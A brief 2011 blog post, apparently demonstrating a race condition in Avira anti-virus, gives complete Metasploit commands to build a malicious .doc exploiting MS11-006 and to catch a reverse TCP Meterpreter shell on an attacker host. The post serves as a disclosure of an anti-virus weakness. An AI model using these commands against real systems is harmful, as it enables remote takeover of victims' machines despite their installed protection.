Thursday, March 17, 2011

Metasploit Meterpreter race condition against Avira anti-virus

Metasploit Meterpreter race condition against Avira anti-virus: "

This video will demonstrate you a race condition against Avira anti-virus products. This race condition is due to design errors in the Avira anti-virus products themselves.


We will exploit the MS11-006 vulnerability (Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow) and use a reverse TCP meterpreter payload.


As you will see, the installed “Avira AntiVir Personal” anti-virus will detect the attack, but to late. The meterpreter sessions is created and you have access to the system.


The demonstrated product is an update-to-date “Avira AntiVir Personal”. But this race condition appear for others Avira products, such as “Avira AntiVir Premium” and “Avira Premium Security Suite“.


Metasploit commands :


To create the msf.doc file to exploit MS11-06 vulnerability


use exploit/windows/fileformat/ms11_006_createsizeddibsection

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.178.21

exploit


To listen for incoming meterpreter sessions


use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.178.21

set InitialAutoRunScript migrate -f

exploit -j


Demonstration video :

"